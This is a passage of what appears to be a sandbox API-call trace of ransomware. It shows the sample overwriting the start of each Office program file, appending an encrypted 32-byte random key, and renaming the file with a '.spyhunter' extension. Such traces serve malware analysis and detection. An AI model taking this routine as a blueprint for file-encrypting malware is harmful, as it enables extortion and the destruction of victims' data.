lpOverlapped=0x0) returned 1 [0111.522] CloseHandle (hObject=0x16c) returned 1 [0111.534] GetProcessHeap () returned 0x2c0000 [0111.534] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.535] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPRPT.DLL.spyhunter") returned 68 [0111.535] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPRPT.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\proprpt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PROPRPT.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\proprpt.dll.spyhunter")) returned 1 [0111.536] GetProcessHeap () returned 0x2c0000 [0111.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.536] GetProcessHeap () returned 0x2c0000 [0111.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0111.536] GetProcessHeap () returned 0x2c0000 [0111.536] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfab40 | out: hHeap=0x2c0000) returned 1 [0111.536] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7d0 | out: pbBuffer=0x270f7d0) returned 1 [0111.536] GetProcessHeap () returned 0x2c0000 [0111.536] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0111.536] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7c8*=0x30) returned 1 [0111.536] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBTRAP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pubtrap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0111.538] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBTRAP.DLL") returned 58 [0111.538] StrStrW (lpFirst="PUBTRAP.DLL", lpSrch=".txt") returned 0x0 [0111.538] GetProcessHeap () returned 0x2c0000 [0111.538] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.538] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f78c*=0x2800, lpOverlapped=0x0) returned 1 [0111.548] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.548] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f78c*=0x2800, lpOverlapped=0x0) returned 1 [0111.548] GetProcessHeap () returned 0x2c0000 [0111.548] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.549] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.549] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x270f7cc*, lpNumberOfBytesWritten=0x270f78c*=0x4, lpOverlapped=0x0) returned 1 [0111.549] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f78c*=0x30, lpOverlapped=0x0) returned 1 [0111.549] CloseHandle (hObject=0x16c) returned 1 [0111.549] GetProcessHeap () returned 0x2c0000 [0111.549] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0111.549] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBTRAP.DLL.spyhunter") returned 68 [0111.549] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBTRAP.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pubtrap.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBTRAP.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubtrap.dll.spyhunter")) returned 1 [0111.550] GetProcessHeap () returned 0x2c0000 [0111.550] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0111.551] GetProcessHeap () returned 0x2c0000 [0111.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0111.551] GetProcessHeap () returned 0x2c0000 [0111.551] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfac00 | out: hHeap=0x2c0000) returned 1 [0111.551] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7d0 | out: pbBuffer=0x270f7d0) returned 1 [0111.551] GetProcessHeap () returned 0x2c0000 [0111.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0111.551] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7c8*=0x30) returned 1 [0111.551] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBCONV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pubconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0111.552] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBCONV.DLL") returned 58 [0111.552] StrStrW (lpFirst="PUBCONV.DLL", lpSrch=".txt") returned 0x0 [0111.552] GetProcessHeap () returned 0x2c0000 [0111.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0111.552] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f78c*=0x2800, lpOverlapped=0x0) returned 1 [0111.617] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.617] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f78c*=0x2800, lpOverlapped=0x0) returned 1 [0111.617] GetProcessHeap () returned 0x2c0000 [0111.617] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0111.617] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0111.617] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x270f7cc*, lpNumberOfBytesWritten=0x270f78c*=0x4, lpOverlapped=0x0) returned 1 [0111.640] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f78c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f78c*=0x30, lpOverlapped=0x0) returned 1 [0111.640] CloseHandle (hObject=0x16c) returned 1 [0111.669] GetProcessHeap () returned 0x2c0000 [0111.669] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0111.669] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBCONV.DLL.spyhunter") returned 68 [0111.669] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBCONV.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\pubconv.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBCONV.DLL.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubconv.dll.spyhunter")) returned 1 [0111.670] GetProcessHeap () returned 0x2c0000 [0111.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0111.670] GetProcessHeap () returned 0x2c0000 [0111.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0111.670] GetProcessHeap () returned 0x2c0000 [0111.670] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfacc0 | out: hHeap=0x2c0000) returned 1 [0111.670] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7c8 | out: pbBuffer=0x270f7c8) returned 1 [0111.670] GetProcessHeap () returned 0x2c0000 [0111.670] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0111.670] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7c0*=0x30) returned 1 [0111.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORM98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\form98.poc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0111.671] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORM98.POC") returned 64 [0111.671] StrStrW (lpFirst="FORM98.POC", lpSrch=".txt") returned 0x0 [0111.671] GetProcessHeap () returned 0x2c0000 [0111.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0111.671] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f784*=0x2800, lpOverlapped=0x0) returned 1 [0111.747] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0111.747] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f784*=0x2800, lpOverlapped=0x0) returned 1 [0112.216] GetProcessHeap () returned 0x2c0000 [0112.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.216] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.216] WriteFile (in: hFile=0xb4, lpBuffer=0x270f7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x270f7c4*, lpNumberOfBytesWritten=0x270f784*=0x4, lpOverlapped=0x0) returned 1 [0112.254] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f784*=0x30, lpOverlapped=0x0) returned 1 [0112.254] CloseHandle (hObject=0xb4) returned 1 [0112.255] GetProcessHeap () returned 0x2c0000 [0112.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cce2d0 [0112.255] wnsprintfW (in: pszDest=0x2cce2d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORM98.POC.spyhunter") returned 74 [0112.255] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORM98.POC" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\form98.poc"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\PUBWIZ\\FORM98.POC.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\pubwiz\\form98.poc.spyhunter")) returned 1 [0112.256] GetProcessHeap () returned 0x2c0000 [0112.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cce2d0 | out: hHeap=0x2c0000) returned 1 [0112.256] GetProcessHeap () returned 0x2c0000 [0112.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.256] GetProcessHeap () returned 0x2c0000 [0112.256] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cfd330 | out: hHeap=0x2c0000) returned 1 [0112.256] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7c8 | out: pbBuffer=0x270f7c8) returned 1 [0112.256] GetProcessHeap () returned 0x2c0000 [0112.256] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.258] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7c0*=0x30) returned 1 [0112.258] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\VISICON.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\visicon.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0112.268] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\VISICON.EXE") returned 58 [0112.268] StrStrW (lpFirst="VISICON.EXE", lpSrch=".txt") returned 0x0 [0112.268] GetProcessHeap () returned 0x2c0000 [0112.268] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0112.268] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f784*=0x2800, lpOverlapped=0x0) returned 1 [0112.282] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.283] WriteFile (in: hFile=0xb4, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f784*=0x2800, lpOverlapped=0x0) returned 1 [0112.283] GetProcessHeap () returned 0x2c0000 [0112.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0112.283] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.283] WriteFile (in: hFile=0xb4, lpBuffer=0x270f7c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x270f7c4*, lpNumberOfBytesWritten=0x270f784*=0x4, lpOverlapped=0x0) returned 1 [0112.307] WriteFile (in: hFile=0xb4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f784, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f784*=0x30, lpOverlapped=0x0) returned 1 [0112.307] CloseHandle (hObject=0xb4) returned 1 [0112.327] GetProcessHeap () returned 0x2c0000 [0112.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.327] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\VISICON.EXE.spyhunter") returned 68 [0112.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\VISICON.EXE" (normalized: "c:\\program files\\microsoft office\\office14\\visicon.exe"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\VISICON.EXE.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\visicon.exe.spyhunter")) returned 1 [0112.328] GetProcessHeap () returned 0x2c0000 [0112.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.328] GetProcessHeap () returned 0x2c0000 [0112.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.328] GetProcessHeap () returned 0x2c0000 [0112.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d087c8 | out: hHeap=0x2c0000) returned 1 [0112.328] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7c0 | out: pbBuffer=0x270f7c0) returned 1 [0112.328] GetProcessHeap () returned 0x2c0000 [0112.328] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.328] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7b8*=0x30) returned 1 [0112.328] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\techtool.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.329] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.HTM") returned 66 [0112.329] StrStrW (lpFirst="TECHTOOL.HTM", lpSrch=".txt") returned 0x0 [0112.329] GetProcessHeap () returned 0x2c0000 [0112.329] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.329] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f77c*=0x1da, lpOverlapped=0x0) returned 1 [0112.330] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffe26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.330] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x1da, lpNumberOfBytesWritten=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f77c*=0x1da, lpOverlapped=0x0) returned 1 [0112.331] GetProcessHeap () returned 0x2c0000 [0112.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.331] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.331] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x270f7bc*, lpNumberOfBytesWritten=0x270f77c*=0x4, lpOverlapped=0x0) returned 1 [0112.331] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f77c*=0x30, lpOverlapped=0x0) returned 1 [0112.331] CloseHandle (hObject=0x16c) returned 1 [0112.331] GetProcessHeap () returned 0x2c0000 [0112.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.331] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.HTM.spyhunter") returned 76 [0112.331] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\techtool.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.HTM.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\techtool.htm.spyhunter")) returned 1 [0112.332] GetProcessHeap () returned 0x2c0000 [0112.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.332] GetProcessHeap () returned 0x2c0000 [0112.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.332] GetProcessHeap () returned 0x2c0000 [0112.332] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d02470 | out: hHeap=0x2c0000) returned 1 [0112.332] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7c0 | out: pbBuffer=0x270f7c0) returned 1 [0112.332] GetProcessHeap () returned 0x2c0000 [0112.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.332] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7b8*=0x30) returned 1 [0112.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\techtool.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.332] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.GIF") returned 66 [0112.333] StrStrW (lpFirst="TECHTOOL.GIF", lpSrch=".txt") returned 0x0 [0112.333] GetProcessHeap () returned 0x2c0000 [0112.333] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0112.333] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f77c*=0x81a, lpOverlapped=0x0) returned 1 [0112.349] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff7e6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0112.349] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x81a, lpNumberOfBytesWritten=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f77c*=0x81a, lpOverlapped=0x0) returned 1 [0112.349] GetProcessHeap () returned 0x2c0000 [0112.349] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0112.349] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0112.350] WriteFile (in: hFile=0x16c, lpBuffer=0x270f7bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x270f7bc*, lpNumberOfBytesWritten=0x270f77c*=0x4, lpOverlapped=0x0) returned 1 [0112.350] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f77c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f77c*=0x30, lpOverlapped=0x0) returned 1 [0112.350] CloseHandle (hObject=0x16c) returned 1 [0112.350] GetProcessHeap () returned 0x2c0000 [0112.350] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cbe288 [0112.350] wnsprintfW (in: pszDest=0x2cbe288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.GIF.spyhunter") returned 76 [0112.350] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.GIF" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\techtool.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\TECHTOOL.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\techtool.gif.spyhunter")) returned 1 [0112.351] GetProcessHeap () returned 0x2c0000 [0112.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbe288 | out: hHeap=0x2c0000) returned 1 [0112.351] GetProcessHeap () returned 0x2c0000 [0112.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0112.351] GetProcessHeap () returned 0x2c0000 [0112.351] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2d023a0 | out: hHeap=0x2c0000) returned 1 [0112.351] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f7b8 | out: pbBuffer=0x270f7b8) returned 1 [0112.351] GetProcessHeap () returned 0x2c0000 [0112.351] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0112.351] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f7b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f7b0*=0x30) returned 1 [0112.351] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.HTM" (normalized: "c:\\program files\\microsoft office\\stationery\\1033\\seamarbl.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0112.351] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Stationery\\1033\\SEAMARBL.HTM") returned 66 [0112.351] StrStrW (lpFirst="SEAMARBL.HTM", lpSrch=".txt") returned 0x0 [0112.351] GetProcessHeap () returned 